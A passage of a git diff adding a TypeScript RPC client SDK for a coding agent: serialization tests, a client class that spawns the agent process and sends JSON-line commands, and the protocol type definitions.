+		const parsed = JSON.parse(chunks[0].trim());
+		assert.equal(parsed.type, "extension_ui_response");
+		assert.equal(parsed.id, "ui_1");
+		assert.equal(parsed.value, "hello");
+	});
+
+	it("serializes confirmed response", () => {
+		const client = new RpcClient();
+		const chunks: string[] = [];
+		const mockStdin = {
+			write: (data: string) => {
+				chunks.push(data);
+				return true;
+			},
+		};
+		const clientAny = client as any;
+		clientAny.process = { stdin: mockStdin };
+
+		client.sendUIResponse("ui_2", { confirmed: true });
+
+		const parsed = JSON.parse(chunks[0].trim());
+		assert.equal(parsed.confirmed, true);
+		assert.equal(parsed.id, "ui_2");
+	});
+
+	it("serializes cancelled response", () => {
+		const client = new RpcClient();
+		const chunks: string[] = [];
+		const mockStdin = {
+			write: (data: string) => {
+				chunks.push(data);
+				return true;
+			},
+		};
+		const clientAny = client as any;
+		clientAny.process = { stdin: mockStdin };
+
+		client.sendUIResponse("ui_3", { cancelled: true });
+
+		const parsed = JSON.parse(chunks[0].trim());
+		assert.equal(parsed.cancelled, true);
+	});
+});
+
+// ============================================================================
+// init/shutdown/subscribe Serialization Tests
+// ============================================================================
+
+describe("v2 command serialization", () => {
+	// Helper: capture what the client sends to stdin
+	function createMockClient(): { client: RpcClient; sent: any[]; respondNext: (data?: any) => void } {
+		const client = new RpcClient();
+		const sent: any[] = [];
+		let respondFn: ((data: any) => void) | null = null;
+
+		const clientAny = client as any;
+		clientAny.process = {
+			stdin: {
+				write: (data: string) => {
+					const parsed = JSON.parse(data.trim());
+					sent.push(parsed);
+					// Auto-respond with success after a tick
+					if (respondFn) {
+						setTimeout(() => respondFn!(parsed), 5);
+					}
+					return true;
+				},
+			},
+			stderr: new PassThrough(),
+			exitCode: null,
+			kill: () => {},
+			on: () => {},
+			removeListener: () => {},
+		};
+
+		const respondNext = (overrides: any = {}) => {
+			respondFn = (parsed) => {
+				const response = {
+					type: "response",
+					id: parsed.id,
+					command: parsed.type,
+					success: true,
+					data: {},
+					...overrides,
+				};
+				clientAny.handleLine(JSON.stringify(response));
+			};
+		};
+
+		return { client, sent, respondNext };
+	}
+
+	it("init sends correct v2 init command", async () => {
+		const { client, sent, respondNext } = createMockClient();
+		respondNext({ data: { protocolVersion: 2, sessionId: "s1", capabilities: { events: [], commands: [] } } });
+
+		const result = await client.init({ clientId: "test-app" });
+
+		assert.equal(sent.length, 1);
+		assert.equal(sent[0].type, "init");
+		assert.equal(sent[0].protocolVersion, 2);
+		assert.equal(sent[0].clientId, "test-app");
+		assert.equal(result.protocolVersion, 2);
+		assert.equal(result.sessionId, "s1");
+	});
+
+	it("shutdown sends shutdown command", async () => {
+		const { client, sent, respondNext } = createMockClient();
+
+		// Override the process exit wait
+		const clientAny = client as any;
+		const originalProcess = clientAny.process;
+		const exitHandlers: Array<(code: number) => void> = [];
+		clientAny.process = {
+			...originalProcess,
+			on: (event: string, handler: (code: number) => void) => {
+				if (event === "exit") exitHandlers.push(handler);
+			},
+		};
+
+		respondNext();
+
+		// Call shutdown and simulate process exit
+		const shutdownPromise = client.shutdown();
+		await new Promise((r) => setTimeout(r, 20));
+		for (const h of exitHandlers) h(0);
+
+		await shutdownPromise;
+
+		assert.equal(sent.length, 1);
+		assert.equal(sent[0].type, "shutdown");
+	});
+
+	it("subscribe sends subscribe command with event list", async () => {
+		const { client, sent, respondNext } = createMockClient();
+		respondNext();
+
+		await client.subscribe(["execution_complete", "cost_update"]);
+
+		assert.equal(sent.length, 1);
+		assert.equal(sent[0].type, "subscribe");
+		assert.deepEqual(sent[0].events, ["execution_complete", "cost_update"]);
+	});
+
+	it("subscribe with wildcard", async () => {
+		const { client, sent, respondNext } = createMockClient();
+		respondNext();
+
+		await client.subscribe(["*"]);
+
+		assert.equal(sent[0].events.length, 1);
+		assert.equal(sent[0].events[0], "*");
+	});
+});
diff --git a/packages/rpc-client/src/rpc-client.ts b/packages/rpc-client/src/rpc-client.ts
new file mode 100644
index 000000000..4d5edc53c
--- /dev/null
+++ b/packages/rpc-client/src/rpc-client.ts
@@ -0,0 +1,666 @@
+/**
+ * RPC Client for programmatic access to the coding agent.
+ *
+ * Spawns the agent in RPC mode and provides a typed API for all operations.
+ * This is a standalone SDK client — all types are inlined with zero internal
+ * package dependencies.
+ */
+
+import { type ChildProcess, spawn } from "node:child_process";
+import { attachJsonlLineReader, serializeJsonLine } from "./jsonl.js";
+import type {
+	BashResult,
+	CompactionResult,
+	ImageContent,
+	ModelInfo,
+	RpcCommand,
+	RpcInitResult,
+	RpcResponse,
+	RpcSessionState,
+	RpcSlashCommand,
+	ThinkingLevel,
+	SessionStats,
+} from "./rpc-types.js";
+
+// ============================================================================
+// Types
+// ============================================================================
+
+/** Distributive Omit that works with union types */
+type DistributiveOmit<T, K extends keyof T> = T extends unknown ? Omit<T, K> : never;
+
+/** RpcCommand without the id field (for internal send) */
+type RpcCommandBody = DistributiveOmit<RpcCommand, "id">;
+
+/** Agent event — a loosely-typed record from the server. The `type` field is always present. */
+export interface SdkAgentEvent {
+	type: string;
+	[key: string]: unknown;
+}
+
+export interface RpcClientOptions {
+	/** Path to the CLI entry point (default: searches for dist/cli.js) */
+	cliPath?: string;
+	/** Working directory for the agent */
+	cwd?: string;
+	/** Environment variables */
+	env?: Record<string, string>;
+	/** Provider to use */
+	provider?: string;
+	/** Model ID to use */
+	model?: string;
+	/** Additional CLI arguments */
+	args?: string[];
+}
+
+export type RpcEventListener = (event: SdkAgentEvent) => void;
+
+// ============================================================================
+// RPC Client
+// ============================================================================
+
+export class RpcClient {
+	private process: ChildProcess | null = null;
+	private stopReadingStdout: (() => void) | null = null;
+	private _stderrHandler?: (data: Buffer) => void;
+	private eventListeners: RpcEventListener[] = [];
+	private pendingRequests: Map<string, { resolve: (response: RpcResponse) => void; reject: (error: Error) => void }> =
+		new Map();
+	private requestId = 0;
+	private stderr = "";
+	private _stopped = false;
+
+	constructor(private options: RpcClientOptions = {}) {}
+
+	/**
+	 * Start the RPC agent process.
+	 */
+	async start(): Promise<void> {
+		if (this.process) {
+			throw new Error("Client already started");
+		}
+
+		this._stopped = false;
+
+		const cliPath = this.options.cliPath ?? "dist/cli.js";
+		const args = ["--mode", "rpc"];
+
+		if (this.options.provider) {
+			args.push("--provider", this.options.provider);
+		}
+		if (this.options.model) {
+			args.push("--model", this.options.model);
+		}
+		if (this.options.args) {
+			args.push(...this.options.args);
+		}
+
+		this.process = spawn("node", [cliPath, ...args], {
+			cwd: this.options.cwd,
+			env: { ...process.env, ...this.options.env },
+			stdio: ["pipe", "pipe", "pipe"],
+		});
+
+		// Collect stderr for debugging
+		this._stderrHandler = (data: Buffer) => {
+			this.stderr += data.toString();
+		};
+		this.process.stderr?.on("data", this._stderrHandler);
+
+		// Set up strict JSONL reader for stdout.
+		this.stopReadingStdout = attachJsonlLineReader(this.process.stdout!, (line) => {
+			this.handleLine(line);
+		});
+
+		// Detect unexpected subprocess exit and reject all pending requests
+		this.process.on("exit", (code, signal) => {
+			if (this.pendingRequests.size > 0) {
+				const reason = signal ? `signal ${signal}` : `code ${code}`;
+				const error = new Error(`Agent process exited unexpectedly (${reason}). Stderr: ${this.stderr}`);
+				for (const [id, pending] of this.pendingRequests) {
+					this.pendingRequests.delete(id);
+					pending.reject(error);
+				}
+			}
+		});
+
+		// Wait a moment for process to initialize
+		await new Promise((resolve) => setTimeout(resolve, 100));
+
+		if (this.process.exitCode !== null) {
+			throw new Error(`Agent process exited immediately with code ${this.process.exitCode}. Stderr: ${this.stderr}`);
+		}
+	}
+
+	/**
+	 * Stop the RPC agent process.
+	 */
+	async stop(): Promise<void> {
+		if (!this.process) return;
+
+		this._stopped = true;
+
+		this.stopReadingStdout?.();
+		this.stopReadingStdout = null;
+		if (this._stderrHandler) {
+			this.process.stderr?.removeListener("data", this._stderrHandler);
+			this._stderrHandler = undefined;
+		}
+		this.process.kill("SIGTERM");
+
+		// Wait for process to exit
+		await new Promise<void>((resolve) => {
+			const timeout = setTimeout(() => {
+				this.process?.kill("SIGKILL");
+				resolve();
+			}, 1000);
+
+			this.process?.on("exit", () => {
+				clearTimeout(timeout);
+				resolve();
+			});
+		});
+
+		this.process = null;
+		this.pendingRequests.clear();
+	}
+
+	/**
+	 * Subscribe to agent events via callback.
+	 */
+	onEvent(listener: RpcEventListener): () => void {
+		this.eventListeners.push(listener);
+		return () => {
+			const index = this.eventListeners.indexOf(listener);
+			if (index !== -1) {
+				this.eventListeners.splice(index, 1);
+			}
+		};
+	}
+
+	/**
+	 * Async generator that yields agent events as they arrive.
+	 *
+	 * Usage:
+	 * ```ts
+	 * for await (const event of client.events()) {
+	 *   console.log(event.type, event);
+	 * }
+	 * ```
+	 *
+	 * The generator terminates when:
+	 * - `stop()` is called
+	 * - The agent process exits
+	 * - The consumer breaks out of the loop
+	 */
+	async *events(): AsyncGenerator<SdkAgentEvent, void, undefined> {
+		if (!this.process) {
+			throw new Error("Client not started — call start() before events()");
+		}
+
+		if (this._stopped) {
+			return;
+		}
+
+		const buffer: SdkAgentEvent[] = [];
+		let resolve: ((value: void) => void) | null = null;
+		let done = false;
+
+		// When a new event arrives, either push to buffer or wake up the awaiting generator
+		const listener = (event: SdkAgentEvent) => {
+			buffer.push(event);
+			if (resolve) {
+				const r = resolve;
+				resolve = null;
+				r();
+			}
+		};
+
+		// When the process exits, signal the generator to stop
+		const onExit = () => {
+			done = true;
+			if (resolve) {
+				const r = resolve;
+				resolve = null;
+				r();
+			}
+		};
+
+		const unsubscribe = this.onEvent(listener);
+		this.process.on("exit", onExit);
+
+		try {
+			while (!done && !this._stopped) {
+				// Drain buffer first
+				while (buffer.length > 0) {
+					yield buffer.shift()!;
+				}
+
+				// If done after draining, break
+				if (done || this._stopped) {
+					break;
+				}
+
+				// Wait for next event or process exit
+				await new Promise<void>((r) => {
+					resolve = r;
+				});
+			}
+
+			// Drain any remaining events that arrived with the exit signal
+			while (buffer.length > 0) {
+				yield buffer.shift()!;
+			}
+		} finally {
+			unsubscribe();
+			this.process?.removeListener("exit", onExit);
+		}
+	}
+
+	/**
+	 * Get collected stderr output (useful for debugging).
+	 */
+	getStderr(): string {
+		return this.stderr;
+	}
+
+	// =========================================================================
+	// Command Methods
+	// =========================================================================
+
+	/**
+	 * Send a prompt to the agent.
+	 * Returns immediately after sending; use onEvent() or events() to receive streaming events.
+	 * Use waitForIdle() to wait for completion.
+	 */
+	async prompt(message: string, images?: ImageContent[]): Promise<void> {
+		await this.send({ type: "prompt", message, images });
+	}
+
+	/**
+	 * Queue a steering message to interrupt the agent mid-run.
+	 */
+	async steer(message: string, images?: ImageContent[]): Promise<void> {
+		await this.send({ type: "steer", message, images });
+	}
+
+	/**
+	 * Queue a follow-up message to be processed after the agent finishes.
+	 */
+	async followUp(message: string, images?: ImageContent[]): Promise<void> {
+		await this.send({ type: "follow_up", message, images });
+	}
+
+	/**
+	 * Abort current operation.
+	 */
+	async abort(): Promise<void> {
+		await this.send({ type: "abort" });
+	}
+
+	/**
+	 * Start a new session, optionally with parent tracking.
+	 * @param parentSession - Optional parent session path for lineage tracking
+	 * @returns Object with `cancelled: true` if an extension cancelled the new session
+	 */
+	async newSession(parentSession?: string): Promise<{ cancelled: boolean }> {
+		const response = await this.send({ type: "new_session", parentSession });
+		return this.getData(response);
+	}
+
+	/**
+	 * Get current session state.
+	 */
+	async getState(): Promise<RpcSessionState> {
+		const response = await this.send({ type: "get_state" });
+		return this.getData(response);
+	}
+
+	/**
+	 * Set model by provider and ID.
+	 */
+	async setModel(provider: string, modelId: string): Promise<{ provider: string; id: string }> {
+		const response = await this.send({ type: "set_model", provider, modelId });
+		return this.getData(response);
+	}
+
+	/**
+	 * Cycle to next model.
+	 */
+	async cycleModel(): Promise<{
+		model: { provider: string; id: string };
+		thinkingLevel: ThinkingLevel;
+		isScoped: boolean;
+	} | null> {
+		const response = await this.send({ type: "cycle_model" });
+		return this.getData(response);
+	}
+
+	/**
+	 * Get list of available models.
+	 */
+	async getAvailableModels(): Promise<ModelInfo[]> {
+		const response = await this.send({ type: "get_available_models" });
+		return this.getData<{ models: ModelInfo[] }>(response).models;
+	}
+
+	/**
+	 * Set thinking level.
+	 */
+	async setThinkingLevel(level: ThinkingLevel): Promise<void> {
+		await this.send({ type: "set_thinking_level", level });
+	}
+
+	/**
+	 * Cycle thinking level.
+	 */
+	async cycleThinkingLevel(): Promise<{ level: ThinkingLevel } | null> {
+		const response = await this.send({ type: "cycle_thinking_level" });
+		return this.getData(response);
+	}
+
+	/**
+	 * Set steering mode.
+	 */
+	async setSteeringMode(mode: "all" | "one-at-a-time"): Promise<void> {
+		await this.send({ type: "set_steering_mode", mode });
+	}
+
+	/**
+	 * Set follow-up mode.
+	 */
+	async setFollowUpMode(mode: "all" | "one-at-a-time"): Promise<void> {
+		await this.send({ type: "set_follow_up_mode", mode });
+	}
+
+	/**
+	 * Compact session context.
+	 */
+	async compact(customInstructions?: string): Promise<CompactionResult> {
+		const response = await this.send({ type: "compact", customInstructions });
+		return this.getData(response);
+	}
+
+	/**
+	 * Set auto-compaction enabled/disabled.
+	 */
+	async setAutoCompaction(enabled: boolean): Promise<void> {
+		await this.send({ type: "set_auto_compaction", enabled });
+	}
+
+	/**
+	 * Set auto-retry enabled/disabled.
+	 */
+	async setAutoRetry(enabled: boolean): Promise<void> {
+		await this.send({ type: "set_auto_retry", enabled });
+	}
+
+	/**
+	 * Abort in-progress retry.
+	 */
+	async abortRetry(): Promise<void> {
+		await this.send({ type: "abort_retry" });
+	}
+
+	/**
+	 * Execute a bash command.
+	 */
+	async bash(command: string): Promise<BashResult> {
+		const response = await this.send({ type: "bash", command });
+		return this.getData(response);
+	}
+
+	/**
+	 * Abort running bash command.
+	 */
+	async abortBash(): Promise<void> {
+		await this.send({ type: "abort_bash" });
+	}
+
+	/**
+	 * Get session statistics.
+	 */
+	async getSessionStats(): Promise<SessionStats> {
+		const response = await this.send({ type: "get_session_stats" });
+		return this.getData(response);
+	}
+
+	/**
+	 * Export session to HTML.
+	 */
+	async exportHtml(outputPath?: string): Promise<{ path: string }> {
+		const response = await this.send({ type: "export_html", outputPath });
+		return this.getData(response);
+	}
+
+	/**
+	 * Switch to a different session file.
+	 * @returns Object with `cancelled: true` if an extension cancelled the switch
+	 */
+	async switchSession(sessionPath: string): Promise<{ cancelled: boolean }> {
+		const response = await this.send({ type: "switch_session", sessionPath });
+		return this.getData(response);
+	}
+
+	/**
+	 * Fork from a specific message.
+	 * @returns Object with `text` (the message text) and `cancelled` (if extension cancelled)
+	 */
+	async fork(entryId: string): Promise<{ text: string; cancelled: boolean }> {
+		const response = await this.send({ type: "fork", entryId });
+		return this.getData(response);
+	}
+
+	/**
+	 * Get messages available for forking.
+	 */
+	async getForkMessages(): Promise<Array<{ entryId: string; text: string }>> {
+		const response = await this.send({ type: "get_fork_messages" });
+		return this.getData<{ messages: Array<{ entryId: string; text: string }> }>(response).messages;
+	}
+
+	/**
+	 * Get text of last assistant message.
+	 */
+	async getLastAssistantText(): Promise<string | null> {
+		const response = await this.send({ type: "get_last_assistant_text" });
+		return this.getData<{ text: string | null }>(response).text;
+	}
+
+	/**
+	 * Set the session display name.
+	 */
+	async setSessionName(name: string): Promise<void> {
+		await this.send({ type: "set_session_name", name });
+	}
+
+	/**
+	 * Get all messages in the session.
+	 * Messages are returned as opaque objects — the internal structure may vary.
+	 */
+	async getMessages(): Promise<unknown[]> {
+		const response = await this.send({ type: "get_messages" });
+		return this.getData<{ messages: unknown[] }>(response).messages;
+	}
+
+	/**
+	 * Get available commands (extension commands, prompt templates, skills).
+	 */
+	async getCommands(): Promise<RpcSlashCommand[]> {
+		const response = await this.send({ type: "get_commands" });
+		return this.getData<{ commands: RpcSlashCommand[] }>(response).commands;
+	}
+
+	/**
+	 * Send a UI response to a pending extension_ui_request.
+	 * Fire-and-forget — no request/response correlation.
+	 */
+	sendUIResponse(id: string, response: { value?: string; values?: string[]; confirmed?: boolean; cancelled?: boolean }): void {
+		if (!this.process?.stdin) {
+			throw new Error("Client not started");
+		}
+		this.process.stdin.write(serializeJsonLine({
+			type: "extension_ui_response",
+			id,
+			...response,
+		}));
+	}
+
+	/**
+	 * Initialize a v2 protocol session. Must be sent as the first command.
+	 * Returns the negotiated protocol version, session ID, and server capabilities.
+	 */
+	async init(options?: { clientId?: string }): Promise<RpcInitResult> {
+		const response = await this.send({ type: "init", protocolVersion: 2, clientId: options?.clientId });
+		return this.getData<RpcInitResult>(response);
+	}
+
+	/**
+	 * Request a graceful shutdown of the agent process.
+	 * Waits for the response before the process exits.
+	 */
+	async shutdown(): Promise<void> {
+		await this.send({ type: "shutdown" });
+		// Wait for process to exit after shutdown acknowledgment
+		if (this.process) {
+			await new Promise<void>((resolve) => {
+				const timeout = setTimeout(() => {
+					this.process?.kill("SIGKILL");
+					resolve();
+				}, 5000);
+				this.process?.on("exit", () => {
+					clearTimeout(timeout);
+					resolve();
+				});
+			});
+		}
+	}
+
+	/**
+	 * Subscribe to specific event types (v2 only).
+	 * Pass ["*"] to receive all events, or a list of event type strings to filter.
+	 */
+	async subscribe(events: string[]): Promise<void> {
+		await this.send({ type: "subscribe", events });
+	}
+
+	// =========================================================================
+	// Helpers
+	// =========================================================================
+
+	/**
+	 * Wait for agent to become idle (no streaming).
+	 * Resolves when agent_end event is received.
+	 */
+	waitForIdle(timeout = 60000): Promise<void> {
+		return new Promise((resolve, reject) => {
+			const timer = setTimeout(() => {
+				unsubscribe();
+				reject(new Error(`Timeout waiting for agent to become idle. Stderr: ${this.stderr}`));
+			}, timeout);
+
+			const unsubscribe = this.onEvent((event) => {
+				if (event.type === "agent_end") {
+					clearTimeout(timer);
+					unsubscribe();
+					resolve();
+				}
+			});
+		});
+	}
+
+	/**
+	 * Collect events until agent becomes idle.
+	 */
+	collectEvents(timeout = 60000): Promise<SdkAgentEvent[]> {
+		return new Promise((resolve, reject) => {
+			const events: SdkAgentEvent[] = [];
+			const timer = setTimeout(() => {
+				unsubscribe();
+				reject(new Error(`Timeout collecting events. Stderr: ${this.stderr}`));
+			}, timeout);
+
+			const unsubscribe = this.onEvent((event) => {
+				events.push(event);
+				if (event.type === "agent_end") {
+					clearTimeout(timer);
+					unsubscribe();
+					resolve(events);
+				}
+			});
+		});
+	}
+
+	/**
+	 * Send prompt and wait for completion, returning all events.
+	 */
+	async promptAndWait(message: string, images?: ImageContent[], timeout = 60000): Promise<SdkAgentEvent[]> {
+		const eventsPromise = this.collectEvents(timeout);
+		await this.prompt(message, images);
+		return eventsPromise;
+	}
+
+	// =========================================================================
+	// Internal
+	// =========================================================================
+
+	private handleLine(line: string): void {
+		try {
+			const data = JSON.parse(line);
+
+			// Check if it's a response to a pending request
+			if (data.type === "response" && data.id && this.pendingRequests.has(data.id)) {
+				const pending = this.pendingRequests.get(data.id)!;
+				this.pendingRequests.delete(data.id);
+				pending.resolve(data as RpcResponse);
+				return;
+			}
+
+			// Otherwise it's an event — dispatch to listeners
+			for (const listener of this.eventListeners) {
+				listener(data as SdkAgentEvent);
+			}
+		} catch {
+			// Ignore non-JSON lines
+		}
+	}
+
+	private async send(command: RpcCommandBody): Promise<RpcResponse> {
+		if (!this.process?.stdin) {
+			throw new Error("Client not started");
+		}
+
+		const id = `req_${++this.requestId}`;
+		const fullCommand = { ...command, id } as RpcCommand;
+
+		return new Promise((resolve, reject) => {
+			const timeout = setTimeout(() => {
+				this.pendingRequests.delete(id);
+				reject(new Error(`Timeout waiting for response to ${command.type}. Stderr: ${this.stderr}`));
+			}, 30000);
+
+			this.pendingRequests.set(id, {
+				resolve: (response) => {
+					clearTimeout(timeout);
+					resolve(response);
+				},
+				reject: (error) => {
+					clearTimeout(timeout);
+					reject(error);
+				},
+			});
+
+			this.process!.stdin!.write(serializeJsonLine(fullCommand));
+		});
+	}
+
+	private getData<T>(response: RpcResponse): T {
+		if (!response.success) {
+			const errorResponse = response as Extract<RpcResponse, { success: false }>;
+			throw new Error(errorResponse.error);
+		}
+		// Type assertion: we trust response.data matches T based on the command sent.
+		const successResponse = response as Extract<RpcResponse, { success: true; data: unknown }>;
+		return successResponse.data as T;
+	}
+}
diff --git a/packages/rpc-client/src/rpc-types.ts b/packages/rpc-client/src/rpc-types.ts
new file mode 100644
index 000000000..be8bca73b
--- /dev/null
+++ b/packages/rpc-client/src/rpc-types.ts
@@ -0,0 +1,399 @@
+/**
+ * RPC protocol types for headless operation.
+ *
+ * Commands are sent as JSON lines on stdin.
+ * Responses and events are emitted as JSON lines on stdout.
+ *
+ * This file is self-contained — all types that were previously imported from
+ * internal packages are inlined so that this package has zero internal
+ * dependencies.
+ */
+
+// ============================================================================
+// Inlined types (originally from internal packages)
+// ============================================================================
+
+/** Thinking budget level (inlined from agent-core) */
+export type ThinkingLevel = "off" | "minimal" | "low" | "medium" | "high" | "xhigh";
+
+/** Image attachment (inlined from pi-ai) */
+export interface ImageContent {
+	type: "image";
+	data: string; // base64 encoded image data
+	mimeType: string; // e.g., "image/jpeg", "image/png"
+}
+
+/** Model descriptor — opaque for SDK consumers */
+export interface ModelInfo {
+	provider: string;
+	id: string;
+	contextWindow?: number;
+	reasoning?: boolean;
+	[key: string]: unknown;
+}
+
+/** Session statistics (from agent-session.ts) */
+export interface SessionStats {
+	sessionFile: string | undefined;
+	sessionId: string;
+	userMessages: number;
+	assistantMessages: number;
+	toolCalls: number;
+	toolResults: number;
+	totalMessages: number;
+	tokens: {
+		input: number;
+		output: number;
+		cacheRead: number;
+		cacheWrite: number;
+		total: number;
+	};
+	cost: number;
+}
+
+/** Bash command result (from bash-executor.ts) */
+export interface BashResult {
+	/** Combined stdout + stderr output (sanitized, possibly truncated) */
+	output: string;
+	/** Process exit code (undefined if killed/cancelled) */
+	exitCode: number | undefined;
+	/** Whether the command was cancelled via signal */
+	cancelled: boolean;
+	/** Whether the output was truncated */
+	truncated: boolean;
+	/** Path to temp file containing full output (if output exceeded truncation threshold) */
+	fullOutputPath?: string;
+}
+
+/** Compaction result (from compaction.ts) */
+export interface CompactionResult<T = unknown> {
+	summary: string;
+	firstKeptEntryId: string;
+	tokensBefore: number;
+	/** Extension-specific data (e.g., ArtifactIndex, version markers for structured compaction) */
+	details?: T;
+}
+
+// ============================================================================
+// RPC Protocol Versioning
+// ============================================================================
+
+/** Supported protocol versions. v1 is the implicit default; v2 requires an init handshake. */
+export type RpcProtocolVersion = 1 | 2;
+
+// ============================================================================
+// RPC Commands (stdin)
+// ============================================================================
+
+export type RpcCommand =
+	// Prompting
+	| { id?: string; type: "prompt"; message: string; images?: ImageContent[]; streamingBehavior?: "steer" | "followUp" }
+	| { id?: string; type: "steer"; message: string; images?: ImageContent[] }
+	| { id?: string; type: "follow_up"; message: string; images?: ImageContent[] }
+	| { id?: string; type: "abort" }
+	| { id?: string; type: "new_session"; parentSession?: string }
+
+	// State
+	| { id?: string; type: "get_state" }
+
+	// Model
+	| { id?: string; type: "set_model"; provider: string; modelId: string }
+	| { id?: string; type: "cycle_model" }
+	| { id?: string; type: "get_available_models" }
+
+	// Thinking
+	| { id?: string; type: "set_thinking_level"; level: ThinkingLevel }
+	| { id?: string; type: "cycle_thinking_level" }
+
+	// Queue modes
+	| { id?: string; type: "set_steering_mode"; mode: "all" | "one-at-a-time" }
+	| { id?: string; type: "set_follow_up_mode"; mode: "all" | "one-at-a-time" }
+
+	// Compaction
+	| { id?: string; type: "compact"; customInstructions?: string }
+	| { id?: string; type: "set_auto_compaction"; enabled: boolean }
+
+	// Retry
+	| { id?: string; type: "set_auto_retry"; enabled: boolean }
+	| { id?: string; type: "abort_retry" }
+
+	// Bash
+	| { id?: string; type: "bash"; command: string }
+	| { id?: string; type: "abort_bash" }
+
+	// Session
+	| { id?: string; type: "get_session_stats" }
+	| { id?: string; type: "export_html"; outputPath?: string }
+	| { id?: string; type: "switch_session"; sessionPath: string }
+	| { id?: string; type: "fork"; entryId: string }
+	| { id?: string; type: "get_fork_messages" }
+	| { id?: string; type: "get_last_assistant_text" }
+	| { id?: string; type: "set_session_name"; name: string }
+
+	// Messages
+	| { id?: string; type: "get_messages" }
+
+	// Commands (available for invocation via prompt)
+	| { id?: string; type: "get_commands" }
+
+	// Bridge-hosted native terminal
+	| { id?: string; type: "terminal_input"; data: string }
+	| { id?: string; type: "terminal_resize"; cols: number; rows: number }
+	| { id?: string; type: "terminal_redraw" }
+
+	// v2 Protocol
+	| { id?: string; type: "init"; protocolVersion: 2; clientId?: string }
+	| { id?: string; type: "shutdown"; graceful?: boolean }
+	| { id?: string; type: "subscribe"; events: string[] };
+
+// ============================================================================
+// RPC Slash Command (for get_commands response)
+// ============================================================================
+
+/** A command available for invocation via prompt */
+export interface RpcSlashCommand {
+	/** Command name (without leading slash) */
+	name: string;
+	/** Human-readable description */
+	description?: string;
+	/** What kind of command this is */
+	source: "extension" | "prompt" | "skill";
+	/** Where the command was loaded from (undefined for extensions) */
+	location?: "user" | "project" | "path";
+	/** File path to the command source */
+	path?: string;
+}
+
+// ============================================================================
+// RPC State
+// ============================================================================
+
+export interface RpcSessionState {
+	model?: ModelInfo;
+	thinkingLevel: ThinkingLevel;
+	isStreaming: boolean;
+	isCompacting: boolean;
+	steeringMode: "all" | "one-at-a-time";
+	followUpMode: "all" | "one-at-a-time";
+	sessionFile?: string;
+	sessionId: string;
+	sessionName?: string;
+	autoCompactionEnabled: boolean;
+	autoRetryEnabled: boolean;
+	retryInProgress: boolean;
+	retryAttempt: number;
+	messageCount: number;
+	pendingMessageCount: number;
+	/** Whether extension loading has completed. Commands from `get_commands` may be incomplete until true. */
+	extensionsReady: boolean;
+}
+
+// ============================================================================
+// RPC Responses (stdout)
+// ============================================================================
+
+// Success responses with data
+export type RpcResponse =
+	// Prompting (async - events follow)
+	| { id?: string; type: "response"; command: "prompt"; success: true; runId?: string }
+	| { id?: string; type: "response"; command: "steer"; success: true; runId?: string }
+	| { id?: string; type: "response"; command: "follow_up"; success: true; runId?: string }
+	| { id?: string; type: "response"; command: "abort"; success: true }
+	| { id?: string; type: "response"; command: "new_session"; success: true; data: { cancelled: boolean } }
+
+	// State
+	| { id?: string; type: "response"; command: "get_state"; success: true; data: RpcSessionState }
+
+	// Model
+	| {
+			id?: string;
+			type: "response";
+			command: "set_model";
+			success: true;
+			data: ModelInfo;
+	  }
+	| {
+			id?: string;
+			type: "response";
+			command: "cycle_model";
+			success: true;
+			data: { model: ModelInfo; thinkingLevel: ThinkingLevel; isScoped: boolean } | null;
+	  }
+	| {
+			id?: string;
+			type: "response";
+			command: "get_available_models";
+			success: true;
+			data: { models: ModelInfo[] };
+	  }
+
+	// Thinking
+	| { id?: string; type: "response"; command: "set_thinking_level"; success: true }
+	| {
+			id?: string;
+			type: "response";
+			command: "cycle_thinking_level";
+			success: true;
+			data: { level: ThinkingLevel } | null;
+	  }
+
+	// Queue modes
+	| { id?: string; type: "response"; command: "set_steering_mode"; success: true }
+	| { id?: string; type: "response"; command: "set_follow_up_mode"; success: true }
+
+	// Compaction
+	| { id?: string; type: "response"; command: "compact"; success: true; data: CompactionResult }
+	| { id?: string; type: "response"; command: "set_auto_compaction"; success: true }
+
+	// Retry
+	| { id?: string; type: "response"; command: "set_auto_retry"; success: true }
+	| { id?: string; type: "response"; command: "abort_retry"; success: true }
+
+	// Bash
+	| { id?: string; type: "response"; command: "bash"; success: true; data: BashResult }
+	| { id?: string; type: "response"; command: "abort_bash"; success: true }
+
+	// Session
+	| { id?: string; type: "response"; command: "get_session_stats"; success: true; data: SessionStats }
+	| { id?: string; type: "response"; command: "export_html"; success: true; data: { path: string } }
+	| { id?: string; type: "response"; command: "switch_session"; success: true; data: { cancelled: boolean } }
+	| { id?: string; type: "response"; command: "fork"; success: true; data: { text: string; cancelled: boolean } }
+	| {
+			id?: string;
+			type: "response";
+			command: "get_fork_messages";
+			success: true;
+			data: { messages: Array<{ entryId: string; text: string }> };
+	  }
+	| {
+			id?: string;
+			type: "response";
+			command: "get_last_assistant_text";
+			success: true;
+			data: { text: string | null };
+	  }
+	| { id?: string; type: "response"; command: "set_session_name"; success: true }
+
+	// Messages — AgentMessage is opaque for SDK consumers
+	| { id?: string; type: "response"; command: "get_messages"; success: true; data: { messages: unknown[] } }
+
+	// Commands
+	| {
+			id?: string;
+			type: "response";
+			command: "get_commands";
+			success: true;
+			data: { commands: RpcSlashCommand[] };
+	  }
+
+	// Bridge-hosted native terminal
+	| { id?: string; type: "response"; command: "terminal_input"; success: true }
+	| { id?: string; type: "response"; command: "terminal_resize"; success: true }
+	| { id?: string; type: "response"; command: "terminal_redraw"; success: true }
+
+	// v2 Protocol
+	| { id?: string; type: "response"; command: "init"; success: true; data: RpcInitResult }
+	| { id?: string; type: "response"; command: "shutdown"; success: true }
+	| { id?: string; type: "response"; command: "subscribe"; success: true }
+
+	// Error response (any command can fail)
+	| { id?: string; type: "response"; command: string; success: false; error: string };
+
+// ============================================================================
+// v2 Protocol Types
+// ============================================================================
+
+/** Result of the init handshake (v2 only) */
+export interface RpcInitResult {
+	protocolVersion: 2;
+	sessionId: string;
+	capabilities: {
+		events: string[];
+		commands: string[];
+	};
+}
+
+/** v2 execution_complete event — emitted when a prompt/steer/follow_up finishes */
+export interface RpcExecutionCompleteEvent {
+	type: "execution_complete";
+	runId: string;
+	status: "completed" | "error" | "cancelled";
+	reason?: string;
+	stats: SessionStats;
+}
+
+/** v2 cost_update event — emitted per-turn with running cost data */
+export interface RpcCostUpdateEvent {
+	type: "cost_update";
+	runId: string;
+	turnCost: number;
+	cumulativeCost: number;
+	tokens: {
+		input: number;
+		output: number;
+		cacheRead: number;
+		cacheWrite: number;
+	};
+}
+
+/** Discriminated union of all v2-only event types */
+export type RpcV2Event = RpcExecutionCompleteEvent | RpcCostUpdateEvent;
+
